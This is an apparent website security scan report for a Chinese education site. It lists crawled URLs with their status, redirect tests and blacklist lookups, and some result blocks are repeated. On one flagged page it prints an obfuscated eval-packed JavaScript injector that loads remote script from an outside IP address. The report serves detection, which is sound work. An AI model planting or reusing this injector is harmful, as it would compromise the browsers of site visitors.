Scanned pages/files
Request | Server response | Status |
http://shenzhen.kds100.com/ | 200 OK Content-Length: 71438 Content-Type: text/html | clean |
http://shenzhen.kds100.com/res/jquery-1.10.2.min.js | 200 OK Content-Length: 93111 Content-Type: application/x-javascript | clean |
http://www.kds100.com/res/js/FloatAd.js | 200 OK Content-Length: 2901 Content-Type: application/x-javascript | clean |
http://shenzhen.kds100.com/include/dedeajax2.js | 200 OK Content-Length: 7961 Content-Type: application/x-javascript | clean |
http://s20.cnzz.com/stat.php?id=3547652&web_id=3547652&show=pic | 200 OK Content-Length: 10075 Content-Type: application/javascript | clean |
http://shenzhen.kds100.com/js/serviceQQ.js | 200 OK Content-Length: 1505 Content-Type: application/x-javascript | clean |
http://shenzhen.kds100.com/map.html | 200 OK Content-Length: 7918 Content-Type: text/html | clean |
http://shenzhen.kds100.com/list/t_903.html | 200 OK Content-Length: 18149 Content-Type: text/html | clean |
http://shenzhen.kds100.com/list/t_904.html | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://shenzhen.kds100.com/test404page.js | 404 Not Found Content-Length: 2459 Content-Type: text/html | clean |
http://shenzhen.kds100.com/list/t_871.html | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://shenzhen.kds100.com/list/t_880.html | 200 OK Content-Length: 15819 Content-Type: text/html | clean |
http://shenzhen.kds100.com/list/t_883.html | 200 OK Content-Length: 17085 Content-Type: text/html | clean |
http://shenzhen.kds100.com/list/t_884.html | 200 OK Content-Length: 16015 Content-Type: text/html | clean |
http://shenzhen.kds100.com/a/fdfudaojianzhang/20131218/2270.html | 200 OK Content-Length: 18583 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('7 1=2.8("9");1.6="3://5.4.a.i:b/g/?h=f";2.e("c")[0].d(1);',19,19,'|s|document|http|28|115|src|var|createElement|script|238|8080|head|appendChild|getElementsByTagName|70|getq|jsuid|63'.split('|'))) Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: shenzhen.kds100.com
Result:
HTTP/1.1 200 OK
Date: Tue, 06 Jan 2015 15:21:29 GMT
Server: CISCO-IOS
Content-Length: 71438
Content-Type: text/html; charset=gb2312
X-Powered-By: WAF/2.0
X-Safe-Firewall: webscan.360.cn 1.0.5.4 F1W1
...71438 bytes of data.
GET / HTTP/1.1
Host: shenzhen.kds100.com
Result:
HTTP/1.1 200 OK
Date: Tue, 06 Jan 2015 15:21:29 GMT
Server: CISCO-IOS
Content-Length: 71438
Content-Type: text/html; charset=gb2312
X-Powered-By: WAF/2.0
X-Safe-Firewall: webscan.360.cn 1.0.5.4 F1W1
...71438 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: shenzhen.kds100.com
Referer: http://www.google.com/search?q=shenzhen.kds100.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: shenzhen.kds100.com
Referer: http://www.google.com/search?q=shenzhen.kds100.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shenzhen.kds100.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://shenzhen.kds100.com/
Result: shenzhen.kds100.com is not infected or malware details are not published yet.
Result: shenzhen.kds100.com is not infected or malware details are not published yet.